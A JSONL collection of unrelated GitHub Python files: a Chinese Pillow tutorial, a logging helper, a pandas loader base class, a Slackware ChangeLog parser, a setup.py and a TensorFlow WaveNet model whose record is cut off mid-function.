+{"seq_id":"42680613590","text":"'''\n#安装第三方模块\n#今天不是讲第三方模块怎么使用,而是讲如何使用第三方模块。\n\n#通过命令指示符终端\n\nMac:无需安装\nLinux:无需安装\nwindow:勾选了pip和Add python.exe to path\n\n'''\n\n'''\n安装第三方模块,需要知道模块的名字\npip --version\npillow 非常强大的处理图像的工具库\npip install Pillow\n如果报错 pip install --upgrade pip\n\npip -V 查看pip版本,以及pip目录\nprint(sys.path)\n\n'''\nfrom PIL import Image\n\n#打开图片\nim = Image.open(\"lena.tif\")\n#信息,大小,类型\nprint(im.format,im.size,im.mode)\n#设置图片的大小\nim.thumbnail((150,150))\n#保存为新图片\nim.save(\"tem.jpg\",\"JPEG\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hackergong/Python-TrainingCourseLearning","sub_path":"day007/8-第三方模块/第三方模块.py","file_name":"第三方模块.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17423323961","text":"import logging\nimport logging.handlers\nimport os\n\ncdir = os.path.dirname(__file__)\n\ndef get_logger(f='code'):\n logger = logging.getLogger(f)\n logger.setLevel(logging.DEBUG)\n #handler = logging.handlers.SysLogHandler(address = '/dev/log')\n handler = logging.FileHandler(os.path.join(cdir,'logging.log'))\n #handler = logging.FileHandler('{0}myLog_{1}-{2}-{3}.log'.format(myLogFileLocation, datem.year, datem.month, datem.day))\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n return logger\n\n# logging.basicConfig(filename='logging.log',\n# filemode='a',\n# format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n# datefmt='%H:%M:%S',\n# level=logging.DEBUG)\n\n","repo_name":"10acad/iboard10x","sub_path":"utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21674019090","text":"\"\"\"\n @author: HimanshuMittal01\n @organization: ripiktech\n\"\"\"\n\nimport os\nfrom typing import Union, Dict, Callable, List\nfrom pandas import DataFrame\nfrom pandas._typing import FilePath, ReadCsvBuffer\n\nPandasFilePath = Union[FilePath, ReadCsvBuffer[bytes], ReadCsvBuffer[str]]\n\n\nclass BaseLoader:\n def __init__(self, debug: bool = False, debug_dir: str = None) -> None:\n self.debug = debug\n self.debug_dir = debug_dir\n\n @property\n def required_keys(self) -> List[str]:\n raise NotImplementedError()\n\n @property\n def optional_keys(self) -> List[str]:\n raise NotImplementedError()\n\n @property\n def output_keys(self) -> List[str]:\n return [\n \"df_forecasted_demand\",\n \"df_inventory\",\n \"df_procurement_plan\",\n \"df_products_desc\",\n \"df_bom\",\n \"df_recipe\",\n \"df_plant_map\",\n \"df_room_changeover\",\n \"df_crossblock_penalties\",\n \"df_phantom_items\",\n \"df_machine_changeover\",\n \"df_machine_availability\",\n \"df_initial_state\",\n ]\n\n @classmethod\n def validate_keys(cls, func: Callable) -> Dict[str, DataFrame]:\n def inner(\n self, data_files: Dict[str, PandasFilePath], *args, **kwargs\n ) -> Dict[str, DataFrame]:\n # Validate input keys\n keys = data_files.keys()\n for required_key in self.required_keys:\n if required_key not in keys:\n raise ValueError(\n f\"'{required_key}' is required in input data keys!\"\n )\n\n for key in keys:\n if key not in self.required_keys and key not in self.optional_keys:\n raise ValueError(\n f\"'{key}' cannot be interpreted as input data keys!\"\n )\n\n # Load\n output = func(self, data_files, *args, **kwargs)\n\n # Validate output keys\n for output_key in 
self.output_keys:\n if output_key not in output:\n raise ValueError(f\"'{output_key}' not found. Check loader output!\")\n\n # Save if\n if self.debug:\n cleaned_dir = os.path.join(self.debug_dir, \"cleaned/\")\n if not os.path.exists(cleaned_dir):\n os.makedirs(cleaned_dir)\n\n for output_key, df in output.items():\n if df is None:\n continue\n df.to_csv(\n os.path.join(cleaned_dir, f\"{output_key}.csv\"),\n index=False,\n )\n\n return output\n\n return inner\n\n def load_all(self, data_files: Dict[str, PandasFilePath]) -> Dict[str, DataFrame]:\n raise NotImplementedError()\n","repo_name":"Vishruth-N/Ripik_Test","sub_path":"optimus/loaders/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34463217803","text":"\"\"\"\nSlackLog parsers\n================\n\nSlackLog parser takes a unicode representation of a Slackware ChangeLog.txt and produces an in-memory representation\nof it.\n\nThe in-memory representation is an instance of :any:`SlackLog`.\n\"\"\"\nfrom __future__ import print_function\n\nimport re\nimport hashlib\nfrom dateutil import parser\nfrom dateutil import tz\nfrom slacklog.models import SlackLog, SlackLogEntry, SlackLogPkg\nfrom codecs import encode\n\ntry:\n str = unicode\nexcept NameError:\n pass # Forward compatibility with Py3k (unicode is not defined)\n\n# pkg name starts from the beginning of line, and there's a colon followed by\n# a double space. But description can also contain \"something: \",\n# so \"something\" should contain either a slash or a dot for it to look like\n# a file name.\npkg_name_re = re.compile(r'\\A[-a-zA-Z0-9_]+[/.][-a-zA-Z0-9_+/.]*[*]?: ')\n\n# A regex for checking if the timestamp had 12-hour or 24-hour format\nam_pm_re = re.compile(r' [AaPp][Mm]? ')\n\ntzinfos = {\n 'CDT': -5 * 60 * 60,\n 'CST': -6 * 60 * 60,\n 'UTC': 0,\n }\n\n\nclass SlackLogParser (object):\n \"\"\"\n Parser for Slackware ChangeLog.txt files. 
This implementation works for 12.x and newer Slackware versions.\n \"\"\"\n\n def __init__(self):\n self.quiet = False\n \"\"\"If :py:const:`True`, warnings about date parsing are not printed.\"\"\"\n self.min_date = None\n \"\"\"If set to a :py:class:`datetime.datetime` object, older log entries are ignored (not parsed).\"\"\"\n self.ENTRY = 0\n \"\"\"Counter of entries (for debugging).\"\"\"\n self.PKG = 0\n \"\"\"Counter of packages (for debugging).\"\"\"\n\n def parse(self, data):\n \"\"\"\n Return the in-memory representation of the data.\n\n :param data: :py:class:`unicode` -- the ChangeLog.txt content.\n :returns: :any:`SlackLog` -- in-memory representation of data\n \"\"\"\n assert(isinstance(data, str))\n log = SlackLog()\n log.startsWithSeparator = re.match('\\A(\\+-+\\+[\\n]?)', data)\n log.endsWithSeparator = re.search('[\\n](\\+-+\\+[\\n]?)\\Z', data)\n if log.startsWithSeparator:\n data = data[log.startsWithSeparator.start():]\n log.startsWithSeparator = True\n else:\n log.startsWithSeparator = False\n if log.endsWithSeparator:\n data = data[:log.endsWithSeparator.start(1)]\n log.endsWithSeparator = True\n else:\n log.endsWithSeparator = False\n\n for entry_data in self.split_log_to_entries(data):\n entry = self.parse_entry(entry_data, log)\n if entry:\n log.entries.insert(0, entry)\n return log\n\n def split_log_to_entries(self, data):\n \"\"\"\n Split the ChangeLog.txt into a list of unparsed entries.\n\n :param data: :py:class:`unicode` --the ChangeLog.txt content.\n :returns: [:py:class:`unicode`] -- list of unparsed entries, separators removed.\n \"\"\"\n assert(isinstance(data, str))\n raw_entries = re.split('\\+-+\\+', data)\n entries = []\n for entry in raw_entries:\n entry = entry.lstrip()\n if entry and entry != \"\":\n entries.append(entry)\n entries.reverse()\n return entries\n\n def parse_entry(self, data, log):\n \"\"\"\n Parse a single ChangeLog entry.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :param log: :any:`SlackLog` -- in-memory representation that is being parsed.\n :return: :any:`SlackLogEntry` -- in-memory representation of the ChangeLog entry.\n \"\"\"\n assert(isinstance(data, str))\n assert(isinstance(log, SlackLog))\n self.ENTRY += 1\n self.PKG = 0\n checksum = self.gen_entry_checksum(data)\n parent = None\n if log.entries:\n parent = log.entries[0].identifier\n identifier = self.gen_entry_identifier(data, checksum, parent)\n else:\n identifier = self.gen_entry_identifier(data, checksum, None)\n timestamp, timezone, twelve_hour, data = self.parse_entry_timestamp(data)\n if self.min_date and self.min_date > timestamp:\n return None\n description, data = self.parse_entry_description(data)\n entry = SlackLogEntry(timestamp, description, log, checksum=checksum, identifier=identifier, parent=parent,\n timezone=timezone, twelveHourFormat=twelve_hour)\n for pkg_data in self.split_entry_to_pkgs(data):\n pkg = self.parse_pkg(pkg_data, entry)\n entry.pkgs.append(pkg)\n return entry\n\n def gen_entry_checksum(self, data):\n \"\"\"\n Generate ChangeLog entry checksum from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :return: :py:class:`unicode` -- Entry checksum.\n \"\"\"\n assert(isinstance(data, str))\n return u'%s' % hashlib.sha512(encode(data, 'utf-8')).hexdigest()\n\n def gen_entry_identifier(self, data, checksum, parent):\n \"\"\"\n Generate ChangeLog entry identifier from data, checksum, and/or parent identifier.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :param checksum: 
:py:class:`unicode` -- ChangeLog entry checksum.\n :param parent: :py:class:`unicode` -- Parent entry identifier or :py:const:`None`\n :return: :py:class:`unicode` -- Entry identifier.\n \"\"\"\n if parent is not None:\n return u'%s' % hashlib.sha512(encode(parent + checksum, 'utf-8')).hexdigest()\n return u'%s' % hashlib.sha512(encode(checksum, 'utf-8')).hexdigest()\n\n def parse_entry_timestamp(self, data):\n \"\"\"\n Parse ChangeLog entry timestamp from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :returns: [:py:class:`datetime.datetime`, :py:class:`tzinfo`, :py:class:`bool`, :py:class:`unicode`] --\n a four element list: timestamp in UTC, original timezone, :py:const:`True` if the timestamp had a 12-hour\n clock, and the rest of the entry.\n \"\"\"\n assert(isinstance(data, str))\n timestamp_str, data = self.get_line(data)\n timestamp, timezone = self.parse_date_with_timezone(timestamp_str)\n if am_pm_re.search(timestamp_str):\n return [timestamp, timezone, True, data]\n return [timestamp, timezone, False, data]\n\n def parse_entry_description(self, data):\n \"\"\"\n Parse ChangeLog entry description from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content (without timestamp).\n :returns: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: description and the rest of the entry.\n \"\"\"\n assert(isinstance(data, str))\n description = u''\n while data and not pkg_name_re.match(data):\n line, data = self.get_line(data)\n description += line\n return [description, data]\n\n def split_entry_to_pkgs(self, data):\n \"\"\"\n Split ChangeLog entry content into a list of unparsed packages.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content (without timestamp or description).\n :return: [:py:class:`unicode`] -- a list of unparsed packages.\n \"\"\"\n assert(isinstance(data, str))\n pkgs = []\n pkg_lines = []\n if data == u'' or data == u'\\n':\n return []\n for line in data.split('\\n'):\n if not pkg_name_re.match(line):\n pkg_lines.append(line)\n else:\n if pkg_lines:\n # pkg_lines is not the last package in\n # the entry: add an extra newline\n pkgs.append('\\n'.join(pkg_lines) + '\\n')\n pkg_lines = []\n if line:\n pkg_lines.append(line)\n if pkg_lines:\n # last package in the entry: no extra newline\n pkgs.append('\\n'.join(pkg_lines))\n return pkgs\n\n def parse_pkg(self, data, entry):\n \"\"\"\n Parse a single package.\n\n :param data: :py:class:`unicode` -- Package name and description of the update.\n :param entry: :any:`SlackLogEntry` -- in-memory representation of the ChangeLog entry being parsed.\n :return: :any:`SlackLogPkg` -- in-memory representation of the package.\n \"\"\"\n assert(isinstance(data, str))\n assert(isinstance(entry, SlackLogEntry))\n self.PKG += 1\n try:\n pkg, data = self.parse_pkg_name(data)\n except ValueError:\n print(\"data: '%s...'\" % data[0:50])\n raise\n description = self.parse_pkg_description(data)\n return SlackLogPkg(pkg, description, entry)\n\n def parse_pkg_name(self, data):\n \"\"\"\n Parse package name from a package.\n\n :param data: :py:class:`unicode` -- Package name and description.\n :return: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: package name and package description.\n \"\"\"\n assert(isinstance(data, str))\n return data.split(u':', 1)\n\n def parse_pkg_description(self, data):\n \"\"\"\n Parse package description from a package.\n\n :param data: :py:class:`unicode` -- Package description.\n :return: :py:class:`unicode` -- Package 
description.\n \"\"\"\n assert(isinstance(data, str))\n return data\n\n def get_line(self, data):\n \"\"\"\n Consume one line from data.\n\n :param data: :py:class:`unicode` -- Data.\n :return: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: first line, rest of the data.\n \"\"\"\n assert(isinstance(data, str))\n try:\n line, data = data.split(u'\\n', 1)\n line += u'\\n'\n except ValueError: # No newlines\n line = data\n data = u''\n return [line, data]\n\n def parse_date(self, data):\n \"\"\"\n Parse a time string into a timestamp.\n\n :param data: :py:class:`unicode` -- Time string.\n :return: :py:class:`datetime.datetime` -- Timestamp in UTC timezone.\n \"\"\"\n if data is None:\n return None\n timestamp, timezone = self.parse_date_with_timezone(data)\n return timestamp\n\n def parse_date_with_timezone(self, data):\n \"\"\"\n Parse a time string into a timestamp.\n\n :param data: :py:class:`unicode` -- Time string.\n :return: [:py:class:`datetime.datetime`, :py:class:`tzinfo`] -- a two element list: Timestamp in UTC timezone, and the original timezone.\n \"\"\"\n if data is None:\n return None\n assert(isinstance(data, str))\n timestamp = parser.parse(data, tzinfos=tzinfos)\n timezone = timestamp.tzinfo\n if timezone is None:\n # Timestamp was ambiguous, assume UTC\n if not self.quiet:\n from sys import stderr\n stderr.write(\"Warning: Assuming UTC, input was '%s'\" % data)\n timestamp = timestamp.replace(tzinfo=tz.tzutc())\n elif timestamp.tzinfo.utcoffset(timestamp).total_seconds() != 0:\n # Timestamp was in some local timezone,\n # convert to UTC\n tzname = timezone.tzname(timestamp)\n if not self.quiet and tzname not in tzinfos:\n from sys import stderr\n stderr.write(\"Warning: Converting '%s' to UTC\" % tzname)\n timestamp = timestamp.astimezone(tz.tzutc())\n return [timestamp, timezone]\n","repo_name":"vmj/slacklog","sub_path":"slacklog/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":11578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"39842247129","text":"from setuptools import find_packages,setup\nfrom os import path\n\nPROJECT_ROOT = path.abspath(path.dirname(__file__))\nPACKAGE_NAME = \"nm_boostpython\"\nPACKAGE_ROOT = path.join(PROJECT_ROOT, PACKAGE_NAME)\n\n# Important: include files other than .py files in the package\npackage_data = {PACKAGE_NAME: ['nm_boostpython.so']} # warning this must be '' not \"\"\n\nsetup(name='nm_boostpython',\n version='0.0.1',\n description='A test for PyPI',\n author='nervermore',\n author_email='154411296@qq.com',\n url='https://www.python.org/',\n license='MIT',\n keywords='ga nn',\n packages=find_packages(where=PROJECT_ROOT, exclude=(\"docs\", \"tests\", \".github\")),\n package_data = package_data,\n python_requires='>=3.0'\n)","repo_name":"NerverMoreGitHub/nm_boostpyton","sub_path":"py_wheel/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29508838089","text":"import tensorflow as tf\r\n\r\nfrom .ops import mu_law_encode\r\nfrom .mixture import discretized_mix_logistic_loss, sample_from_discretized_mix_logistic\r\n\r\n\r\nclass WaveNetModel(object):\r\n def __init__(self, batch_size, dilations, filter_width, residual_channels, dilation_channels, skip_channels,\r\n quantization_channels=2 ** 8, out_channels=30,\r\n use_biases=False, scalar_input=False, initial_filter_width=32, global_condition_channels=None,\r\n global_condition_cardinality=None, 
local_condition_channels=80, upsample_factor=None, train_mode=True):\r\n\r\n self.batch_size = batch_size\r\n self.dilations = dilations\r\n self.filter_width = filter_width\r\n self.residual_channels = residual_channels\r\n self.dilation_channels = dilation_channels\r\n self.quantization_channels = quantization_channels\r\n self.use_biases = use_biases\r\n self.skip_channels = skip_channels\r\n self.scalar_input = scalar_input\r\n self.initial_filter_width = initial_filter_width\r\n self.global_condition_channels = global_condition_channels\r\n self.global_condition_cardinality = global_condition_cardinality\r\n self.local_condition_channels = local_condition_channels\r\n self.upsample_factor = upsample_factor\r\n self.train_mode = train_mode\r\n self.receptive_field = WaveNetModel.calculate_receptive_field(self.filter_width, self.dilations,\r\n self.scalar_input, self.initial_filter_width)\r\n self.out_channels = out_channels\r\n\r\n self.ema = tf.train.ExponentialMovingAverage(decay=0.9999)\r\n\r\n @staticmethod\r\n def calculate_receptive_field(filter_width, dilations, scalar_input, initial_filter_width):\r\n receptive_field = (filter_width - 1) * sum(\r\n dilations) + 1\r\n if scalar_input:\r\n receptive_field += initial_filter_width - 1\r\n else:\r\n receptive_field += filter_width - 1\r\n return receptive_field\r\n\r\n def _create_causal_layer(self, input_batch):\r\n with tf.name_scope('causal_layer'):\r\n if self.scalar_input:\r\n return tf.layers.conv1d(input_batch, filters=self.residual_channels,\r\n kernel_size=self.initial_filter_width, padding='valid', dilation_rate=1,\r\n use_bias=False)\r\n else:\r\n return tf.layers.conv1d(input_batch, filters=self.residual_channels, kernel_size=self.filter_width,\r\n padding='valid', dilation_rate=1, use_bias=False)\r\n\r\n def _create_queue(self):\r\n with tf.variable_scope('queue'):\r\n if self.scalar_input:\r\n self.causal_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.initial_filter_width, 1], dtype=tf.float32),\r\n name='causal_queue', trainable=False)\r\n else:\r\n self.causal_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.filter_width, self.quantization_channels],\r\n dtype=tf.float32), name='causal_queue', trainable=False)\r\n\r\n self.local_condition_queue = tf.Variable(\r\n initial_value=tf.zeros(shape=[self.batch_size, self.filter_width, self.local_condition_channels],\r\n dtype=tf.float32), name='local_condition_queue', trainable=False)\r\n\r\n self.dilation_queue = []\r\n for i, d in enumerate(self.dilations):\r\n q = tf.Variable(initial_value=tf.zeros(\r\n shape=[self.batch_size, d * (self.filter_width - 1) + 1, self.dilation_channels], dtype=tf.float32),\r\n name='dilation_queue{}'.format(i), trainable=False)\r\n self.dilation_queue.append(q)\r\n\r\n self.queue_initializer = tf.variables_initializer(\r\n self.dilation_queue + [self.causal_queue, self.local_condition_queue])\r\n\r\n def _create_dilation_layer(self, input_batch, layer_index, dilation, local_condition_batch, global_condition_batch,\r\n output_width):\r\n with tf.variable_scope('dilation_layer'):\r\n conv_filter = tf.layers.conv1d(input_batch, filters=self.dilation_channels, kernel_size=self.filter_width,\r\n dilation_rate=dilation, padding='valid', use_bias=self.use_biases,\r\n name='conv_filter')\r\n conv_gate = tf.layers.conv1d(input_batch, filters=self.dilation_channels, kernel_size=self.filter_width,\r\n dilation_rate=dilation, padding='valid', use_bias=self.use_biases,\r\n name='conv_gate')\r\n\r\n 
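# Gated activation unit (as in the WaveNet paper):
# out = tanh(conv_filter + conditioning) * sigmoid(conv_gate + conditioning),
# so the global/local conditioning projections below are added to the filter
# and gate pre-activations before the nonlinearities are applied further down.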
if global_condition_batch is not None:\r\n conv_filter += tf.layers.conv1d(global_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"gc_filter\")\r\n conv_gate += tf.layers.conv1d(global_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"gc_gate\")\r\n\r\n if local_condition_batch is not None:\r\n local_filter = tf.layers.conv1d(local_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"lc_filter\")\r\n local_gate = tf.layers.conv1d(local_condition_batch, filters=self.dilation_channels, kernel_size=1,\r\n padding=\"same\", use_bias=False, name=\"lc_gate\")\r\n\r\n local_filter = tf.slice(local_filter, [0, 0, 0], [-1, tf.shape(conv_filter)[1], -1])\r\n local_gate = tf.slice(local_gate, [0, 0, 0], [-1, tf.shape(conv_gate)[1], -1])\r\n\r\n conv_filter += local_filter\r\n conv_gate += local_gate\r\n\r\n out = tf.tanh(conv_filter) * tf.sigmoid(conv_gate)\r\n\r\n # The 1x1 conv to produce the residual output == FC\r\n transformed = tf.layers.conv1d(out, filters=self.residual_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases, name=\"dense\")\r\n\r\n # The 1x1 conv to produce the skip output\r\n skip_cut = tf.shape(out)[1] - output_width\r\n out_skip = tf.slice(out, [0, skip_cut, 0], [-1, -1, self.dilation_channels])\r\n skip_contribution = tf.layers.conv1d(out_skip, filters=self.skip_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases, name=\"skip\")\r\n\r\n input_cut = tf.shape(input_batch)[1] - tf.shape(transformed)[1]\r\n input_batch = tf.slice(input_batch, [0, input_cut, 0], [-1, -1, -1])\r\n\r\n return skip_contribution, input_batch + transformed\r\n\r\n def create_upsample(self, local_condition_batch):\r\n local_condition_batch = tf.expand_dims(local_condition_batch, [3])\r\n # local condition batch N H W C\r\n\r\n for i in range(len(self.upsample_factor)):\r\n local_condition_batch = tf.layers.conv2d_transpose(local_condition_batch, filters=1,\r\n kernel_size=(self.upsample_factor[i], self.filter_width),\r\n strides=(self.upsample_factor[i], 1), padding='same',\r\n use_bias=False, name='upsample{}'.format(i))\r\n\r\n local_condition_batch = tf.squeeze(local_condition_batch, [3])\r\n return local_condition_batch\r\n\r\n def _create_network(self, input_batch, local_condition_batch, global_condition_batch):\r\n '''Construct the WaveNet network.'''\r\n\r\n if not self.train_mode:\r\n self._create_queue()\r\n\r\n outputs = []\r\n current_layer = input_batch\r\n if not self.train_mode:\r\n self.causal_queue = tf.scatter_update(self.causal_queue, tf.range(self.batch_size),\r\n tf.concat([self.causal_queue[:, 1:, :], input_batch], axis=1))\r\n current_layer = self.causal_queue\r\n\r\n self.local_condition_queue = tf.scatter_update(self.local_condition_queue, tf.range(self.batch_size),\r\n tf.concat([self.local_condition_queue[:, 1:, :],\r\n local_condition_batch], axis=1))\r\n local_condition_batch = self.local_condition_queue\r\n\r\n # Pre-process the input with a regular convolution\r\n current_layer = self._create_causal_layer(current_layer)\r\n\r\n if self.train_mode:\r\n output_width = tf.shape(input_batch)[\r\n 1] - self.receptive_field + 1\r\n else:\r\n output_width = 1\r\n\r\n # Add all defined dilation layers.\r\n with tf.variable_scope('dilated_stack'):\r\n for layer_index, dilation in enumerate(\r\n self.dilations):\r\n with 
tf.variable_scope('layer{}'.format(layer_index)):\r\n\r\n if not self.train_mode:\r\n self.dilation_queue[layer_index] = tf.scatter_update(self.dilation_queue[layer_index],\r\n tf.range(self.batch_size), tf.concat(\r\n [self.dilation_queue[layer_index][:, 1:, :], current_layer], axis=1))\r\n current_layer = self.dilation_queue[layer_index]\r\n\r\n output, current_layer = self._create_dilation_layer(current_layer, layer_index, dilation,\r\n local_condition_batch, global_condition_batch,\r\n output_width)\r\n outputs.append(output)\r\n with tf.name_scope('postprocessing'):\r\n # Perform (+) -> ReLU -> 1x1 conv -> ReLU -> 1x1 conv to\r\n # postprocess the output.\r\n\r\n # We skip connections from the outputs of each layer, adding them\r\n # all up here.\r\n total = sum(outputs)\r\n transformed1 = tf.nn.relu(total)\r\n conv1 = tf.layers.conv1d(transformed1, filters=self.skip_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases)\r\n\r\n transformed2 = tf.nn.relu(conv1)\r\n if self.scalar_input:\r\n conv2 = tf.layers.conv1d(transformed2, filters=self.out_channels, kernel_size=1, padding=\"same\",\r\n use_bias=self.use_biases)\r\n else:\r\n conv2 = tf.layers.conv1d(transformed2, filters=self.quantization_channels, kernel_size=1,\r\n padding=\"same\", use_bias=self.use_biases)\r\n\r\n return conv2\r\n\r\n def _one_hot(self, input_batch):\r\n '''One-hot encodes the waveform amplitudes.\r\n\r\n This allows the definition of the network as a categorical distribution\r\n over a finite set of possible amplitudes.\r\n '''\r\n with tf.name_scope('one_hot_encode'):\r\n encoded = tf.one_hot(input_batch, depth=self.quantization_channels,\r\n dtype=tf.float32) # (1, ?, 1) --> (1, ?, 1, 256)\r\n shape = [self.batch_size, -1, self.quantization_channels]\r\n encoded = tf.reshape(encoded, shape) # (1, ?, 1, 256) --> (1, ?, 256)\r\n return encoded\r\n\r\n def _embed_gc(self, global_condition):\r\n '''Returns embedding for global condition.\r\n :param global_condition: Either ID of global condition for\r\n tf.nn.embedding_lookup or actual embedding. 
The latter is\r\n experimental.\n :return: Embedding or None\r\n '''\r\n embedding = None\r\n if self.global_condition_cardinality is not None:\r\n # Only lookup the embedding if the global condition is presented\r\n # as an integer of mutually-exclusive categories ...\r\n embedding_table = tf.get_variable('gc_embedding',\r\n [self.global_condition_cardinality, self.global_condition_channels],\r\n dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer(\r\n uniform=False))\r\n embedding = tf.nn.embedding_lookup(embedding_table, global_condition)\r\n elif global_condition is not None:\r\n # In this case, the number of global_embedding channels must be\r\n # equal to the last dimension of the global_condition tensor.\r\n gc_batch_rank = len(global_condition.get_shape())\r\n dims_match = (global_condition.get_shape()[gc_batch_rank - 1] == self.global_condition_channels)\r\n if not dims_match:\r\n raise ValueError('Shape of global_condition {} does not match global_condition_channels {}.'.format(\r\n global_condition.get_shape(),\r\n self.global_condition_channels))\r\n embedding = global_condition\r\n\r\n if embedding is not None:\r\n embedding = tf.reshape(embedding, [self.batch_size, 1, self.global_condition_channels])\r\n\r\n return embedding\r\n\r\n def predict_proba_incremental(self, waveform, upsampled_local_condition=None, global_condition=None,\r\n name='wavenet'):\r\n \"\"\"\r\n local_condition: upsampled local condition\r\n \"\"\"\r\n\r\n with tf.variable_scope(name):\r\n\r\n if self.scalar_input:\r\n encoded = tf.reshape(waveform, [self.batch_size, -1, 1])\r\n else:\r\n encoded = tf.one_hot(waveform, self.quantization_channels)\r\n encoded = tf.reshape(encoded,\r\n [self.batch_size, -1, self.quantization_channels]) # encoded shape=(N,1, 256)\r\n\r\n gc_embedding = self._embed_gc(global_condition) # --> shape=(1, 1, 32)\r\n\r\n # local condition\r\n if upsampled_local_condition is not None:\r\n upsampled_local_condition = tf.reshape(upsampled_local_condition,\r\n [self.batch_size, -1, self.local_condition_channels])\r\n\r\n raw_output = self._create_network(encoded, upsampled_local_condition,\r\n gc_embedding)\r\n\r\n if self.scalar_input:\r\n out = tf.reshape(raw_output, [self.batch_size, -1, self.out_channels])\r\n proba = sample_from_discretized_mix_logistic(out)\r\n else:\r\n out = tf.reshape(raw_output, [self.batch_size, self.quantization_channels])\r\n proba = tf.cast(tf.nn.softmax(tf.cast(out, tf.float64)), tf.float32)\r\n\r\n return proba\r\n\r\n def add_loss(self, input_batch, local_condition=None, global_condition_batch=None, l2_regularization_strength=None,\r\n name='wavenet'):\r\n '''Creates a WaveNet network and returns the autoencoding loss.\r\n\r\n The variables are all scoped to the given name.\r\n '''\r\n with tf.variable_scope(name):\r\n encoded_input = mu_law_encode(input_batch,\r\n self.quantization_channels)\r\n\r\n gc_embedding = self._embed_gc(\r\n global_condition_batch)\r\n encoded = self._one_hot(encoded_input) # (1, ?, quantization_channels=256)\r\n if self.scalar_input:\r\n network_input = tf.reshape(tf.cast(input_batch, tf.float32), [self.batch_size, -1, 1])\r\n else:\r\n network_input = encoded\r\n\r\n # Cut off the last sample of network input to preserve causality.\r\n network_input_width = tf.shape(network_input)[1] - 1\r\n if self.scalar_input:\r\n input = tf.slice(network_input, [0, 0, 0], [-1, network_input_width, 1])\r\n else:\r\n input = tf.slice(network_input, [0, 0, 0], [-1, network_input_width, 
self.quantization_channels])\r\n\r\n # local condition\r\n if local_condition is not None:\r\n local_condition = self.create_upsample(local_condition)\r\n\r\n raw_output = self._create_network(input, local_condition,\r\n gc_embedding)\r\n\r\n with tf.name_scope('loss'):\r\n # Cut off the samples corresponding to the receptive field\r\n # for the first predicted sample.\r\n target_output = tf.slice(network_input, [0, self.receptive_field, 0],\r\n [-1, -1, -1])\r\n\r\n if self.scalar_input:\r\n loss = discretized_mix_logistic_loss(raw_output, target_output, num_class=2 ** 16, reduce=False)\r\n reduced_loss = tf.reduce_mean(loss)\r\n else:\r\n target_output = tf.reshape(target_output, [-1, self.quantization_channels])\r\n prediction = tf.reshape(raw_output, [-1, self.quantization_channels])\r\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=prediction, labels=target_output)\r\n reduced_loss = tf.reduce_mean(loss)\r\n\r\n tf.summary.scalar('loss', reduced_loss)\r\n\r\n if l2_regularization_strength is None:\r\n self.loss = reduced_loss\r\n else:\r\n # L2 regularization for all trainable parameters\r\n l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if not ('bias' in v.name)])\r\n\r\n # Add the regularization term to the loss\r\n total_loss = (reduced_loss + l2_regularization_strength * l2_loss)\r\n\r\n tf.summary.scalar('l2_loss', l2_loss)\r\n tf.summary.scalar('total_loss', total_loss)\r\n\r\n self.loss = total_loss\r\n\r\n def add_optimizer(self, hparams, global_step):\r\n '''Adds optimizer to the graph. Assumes that the initialize function has already been called.\r\n '''\r\n with tf.variable_scope('optimizer'):\r\n hp = hparams\r\n\r\n learning_rate = tf.train.exponential_decay(hp.wavenet_learning_rate, global_step, hp.wavenet_decay_steps,\r\n hp.wavenet_decay_rate)\r\n\r\n # Adam optimization\r\n self.learning_rate = learning_rate\r\n optimizer = tf.train.AdamOptimizer(learning_rate)\r\n\r\n gradients, variables = zip(\r\n *optimizer.compute_gradients(self.loss)) # len(tf.trainable_variables()) = len(variables)\r\n self.gradients = gradients\r\n\r\n # Gradients clipping\r\n if hp.wavenet_clip_gradients:\r\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, 1.)\r\n else:\r\n clipped_gradients = gradients\r\n\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n adam_optimize = optimizer.apply_gradients(zip(clipped_gradients, variables), global_step=global_step)\r\n\r\n # https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage\r\n # Use adam optimization process as a dependency\r\n with 